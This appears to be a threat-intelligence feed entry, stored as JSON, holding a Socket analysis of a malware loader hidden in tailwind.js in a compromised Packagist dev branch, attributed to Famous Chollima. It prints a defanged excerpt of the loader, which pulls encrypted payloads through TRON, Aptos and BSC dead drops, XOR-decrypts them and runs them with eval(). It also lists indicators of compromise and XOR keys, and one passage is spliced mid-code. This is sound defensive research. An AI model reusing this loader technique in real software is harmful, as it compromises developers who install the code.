[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwGdcdM3T-Ny020iiBzVvLjjZmuPWdlAsUKBAMbiOrAQ":3},{"article":4,"iocs":56},{"id":5,"title":6,"slug":7,"summary":8,"ai_summary":9,"brief":10,"full_text":11,"url":12,"image_url":13,"published_at":14,"ingested_at":15,"relevance_score":16,"entities":17,"category_id":33,"category":34,"article_tags":38},"3d0ca37f-2f0f-44d5-87a2-3bcddab11cf7","Famous Chollima Targets PHP Developers Through Compromised Packagist Package","famous-chollima-targets-php-developers-through-compromised-packagist-package-723ecc","We identified malicious obfuscated JavaScript appended to tailwind.js in the Packagist development version dev-drewroberts\u002Ffeature\u002Ftest-case of the PHP package roberts\u002Fleads. The package itself is a legitimate Laravel package associated with a maintainer, Drew Roberts. The malicious code appears isolated to a specific development branch, drewroberts\u002Ffeature\u002Ftest-case, exposed through Packagist as an installable dev version. Socket AI Scanner flagged dev-drewroberts\u002Ffeature\u002Ftest-case as known malware after identifying obfuscated JavaScript hidden in tailwind.js, including runtime exposure of Node.js internals and immediate execution of a decoded staging payload rather than legitimate Tailwind configuration logic. The payload is hidden after an otherwise normal Tailwind configuration. Once deobfuscated, it behaves as a JavaScript malware loader. It reaches out to blockchain and public RPC infrastructure, including TRON, Aptos, and BNB Smart Chain services, retrieves encrypted payload material, decrypts it with embedded XOR keys, executes the result with eval(), and can launch a detached hidden Node.js child process. We assess this as a likely developer or repository compromise, or a poisoned-branch workflow, rather than a malicious package created from scratch. The malicious code appears confined to a dev\u002Ftest branch exposed through Packagist, while the stable release line did not show the same indicators in our review. This pattern closely resembles recent GitHub Community reports of malicious JavaScript being injected into legitimate developer configuration files as part of an active supply chain campaign associated with North Korean APT activity and Famous Chollima. While the threat group originally gained notoriety for infiltrating companies as fake employees, they are equally famous for reversing the script, creating fake companies and jobs to compromise external developers. Given the branch name, the malware family, identified indicators of compromise, and the delivery path through trusted developer infrastructure, this package version may have been intended for a fake job interview or developer-task lure, consistent with a Contagious Interview-like scenario. Packagist listed the affected roberts\u002Fleads dev branch as an installable version. We reported it to the Packagist security team, who promptly reviewed the issue and removed the malicious version. We appreciate their quick response in this case and their continued action on PHP ecosystem abuse reports. In addition to reporting the affected version to Packagist’s security team, we also notified the project maintainer, Drew Roberts, both through GitHub and through the email address listed for reporting security incidents. In parallel, we flagged the malicious tailwind.js file in the affected GitHub repository branch to GitHub Security for review. The Malicious tailwind.js # At first glance, tailwind.js looks like a normal Tailwind configuration file: module.exports = { purge: [], theme: { extend: {}, }, variants: {}, plugins: [], }; The malicious payload appears after the legitimate config, hidden far to the right after a large whitespace gap: }; global['!']='9-0264-2';var _$_1e42=... Everything after the closing }; is unrelated to Tailwind. The appended JavaScript is obfuscated and reconstructs its real behavior at runtime. Deobfuscation Findings # The loader uses several concealment and staging techniques: A large whitespace gap hides the malicious payload after the legitimate Tailwind configuration, making it easy to miss in code review. The campaign marker global['!']='9-0264-2' is later expanded into global['_V']='A9-0264-2'. Global aliases reconstruct Node.js internals, including require and module, to obscure later calls. Blockchain and public RPC infrastructure provide encrypted payload material. Hardcoded XOR keys decrypt the retrieved content into executable JavaScript. eval() executes the decrypted payload inside the Node.js process. child_process.spawn() can launch a detached hidden Node.js process with windowsHide: true. # The deobfuscated loader uses blockchain infrastructure as a dead drop mechanism. TRON and Aptos provide payload pointers, while BNB Smart Chain RPC services return transaction input data containing encrypted payload material. A shortened, simplified, and defanged excerpt of the loader logic is shown below: async function resolvePayload(xorKey, tronWallet, aptosFallback) { let txHash; try { txHash = Buffer.from( (await getJson( \"hxxps:\u002F\u002Fapi[.]trongrid[.]io\u002Fv1\u002Faccounts\u002F\" + tronWallet + \"\u002Ftransactions?only_confirmed=true&only_from=true&limit=1\" )).data[0].raw_data.data, \"hex\" ).toString(\"utf8\").split(\"\").reverse().join(\"\"); \u002F\u002F Uses TRON transaction data as a payload pointer. } catch { txHash = ( await getJson( \"hxxps:\u002F\u002Ffullnode[.]mainnet[.]aptoslabs[.]com\u002Fv1\u002Faccounts\u002F\" + aptosFallback + \"\u002Ftransactions?limit=1\" ) )[0].payload.arguments[0]; \u002F\u002F Falls back to Aptos if TRON retrieval fails. } const encryptedPayload = await getBscTransactionInput(txHash); return xorDecrypt(encryptedPayload, xorKey); } const firstStage = await resolvePayload( \"2[gWfGj; \u002Fdev\u002Fnull || true done Indicators of Compromise # Package and Repository Affected Packagist version: dev-drewroberts\u002Ffeature\u002Ftest-case Mapped GitHub branch: drewroberts\u002Ffeature\u002Ftest-case Affected file: tailwind.js Observed branch commit: 6c5c3c7655ce76399af11126b7e9a9058eb2e45d Package URL: https:\u002F\u002Fpackagist.org\u002Fpackages\u002Froberts\u002Fleads Repository URL: https:\u002F\u002Fgithub.com\u002Froberts\u002Fleads Affected file URL: hxxps:\u002F\u002Fgithub[.]com\u002Froberts\u002Fleads\u002Fblob\u002Fdrewroberts\u002Ffeature\u002Ftest-case\u002Ftailwind.js SHA-256 Hashes Archive: 522b28a2f78771715497ba53729d4ab9a50e982322c391379f3bddf7c8cb363f tailwind.js: 96afdba882046385242cbed46871e41147c8055c5d9eff7460847b2c01a77dc3 TRON Wallets TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP TXfxHUet9pJVU1BgVkBAbrES4YUc1nGzcG Aptos Fallback Identifiers 0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e 0x3f0e5781d0855fb460661ac63257376db1941b2bb522499e4757ecb3ebd5dce3 XOR Keys 2[gWfGj;\u003C:-93Z^C m6:tTh^D)cBz?NM] # T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain T1204.002 — User Execution: Malicious File T1059.007 — Command and Scripting Interpreter: JavaScript T1027 — Obfuscated Files or Information T1102.001 — Web Service: Dead Drop Resolver T1105 — Ingress Tool Transfer","The Famous Chollima APT group is targeting PHP developers through a compromised Packagist package. The malicious code, found in a development version of the `roberts\u002Fleads` package, injects obfuscated JavaScript into `tailwind.js` to retrieve and execute encrypted payloads from blockchain infrastructure. This campaign may be part of a fake job interview or developer-task lure.","Famous Chollima APT targets PHP developers via compromised Packagist package with malicious JavaScript in tailwind.js.","Research\u002FSecurity NewsMalicious NuGet Package Impersonates Sicoob SDK to Exfiltrate Banking Certificates and PasswordsA malicious NuGet package impersonating Sicoob exfiltrated client IDs, PFX passwords, and banking certificates through Sentry telemetry. By Kirill Boychenko - May 28, 2026","https:\u002F\u002Fsocket.dev\u002Fblog\u002Ffamous-chollima-targets-php-developers-through-compromised-packagist-package?utm_medium=feed","https:\u002F\u002Fcdn.sanity.io\u002Fimages\u002Fcgdhsj6q\u002Fproduction\u002F9c9f4529da2ec05ccce30e3b294d2485de9a666a-1672x941.png?w=1000&q=95&fit=max&auto=format","2026-05-31T18:41:00.591+00:00","2026-05-31T22:00:11.23472+00:00",9,[18,21,24,27,29,31],{"name":19,"type":20},"Famous Chollima","threat_actor",{"name":22,"type":23},"tailwind.js","product",{"name":25,"type":26},"JavaScript","technology",{"name":28,"type":26},"Node.js",{"name":30,"type":26},"Packagist",{"name":32,"type":23},"Laravel","26b0b636-0e31-4db1-bffb-61bdf9f20a58",{"id":33,"icon":35,"name":36,"slug":37},null,"Supply Chain","supply-chain",[39,41,46,51],{"category":40},{"id":33,"icon":35,"name":36,"slug":37},{"category":42},{"id":43,"icon":35,"name":44,"slug":45},"89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5","Malware","malware",{"category":47},{"id":48,"icon":35,"name":49,"slug":50},"ade75414-7914-4e23-a450-48b64546ee70","Open Source","open-source",{"category":52},{"id":53,"icon":35,"name":54,"slug":55},"e7b231c8-5f79-4465-8d38-1ef13aea5a14","Threat Intelligence","threat-intelligence",[57,61,64,68,71,75,78,82,85,88,91,94],{"type":58,"value":59,"context":60},"url","hxxps:\u002F\u002Fapi[.]trongrid[.]io\u002Fv1\u002Faccounts\u002FTMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP\u002Ftransactions?only_confirmed=true&only_from=true&limit=1","TRON API to retrieve transaction data",{"type":58,"value":62,"context":63},"hxxps:\u002F\u002Ffullnode[.]mainnet[.]aptoslabs[.]com\u002Fv1\u002Faccounts\u002F0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e\u002Ftransactions?limit=1","Aptos API to retrieve transaction data",{"type":65,"value":66,"context":67},"hash_sha256","522b28a2f78771715497ba53729d4ab9a50e982322c391379f3bddf7c8cb363f","Archive SHA256",{"type":65,"value":69,"context":70},"96afdba882046385242cbed46871e41147c8055c5d9eff7460847b2c01a77dc3","tailwind.js SHA256",{"type":72,"value":73,"context":74},"domain","trongrid.io","TRON API",{"type":72,"value":76,"context":77},"aptoslabs.com","Aptos API",{"type":79,"value":80,"context":81},"mitre_attack","T1195.002","Supply Chain Compromise",{"type":79,"value":83,"context":84},"T1204.002","User Execution: Malicious File",{"type":79,"value":86,"context":87},"T1059.007","Command and Scripting Interpreter: JavaScript",{"type":79,"value":89,"context":90},"T1027","Obfuscated Files or Information",{"type":79,"value":92,"context":93},"T1102.001","Web Service: Dead Drop Resolver",{"type":79,"value":95,"context":96},"T1105","Ingress Tool Transfer"]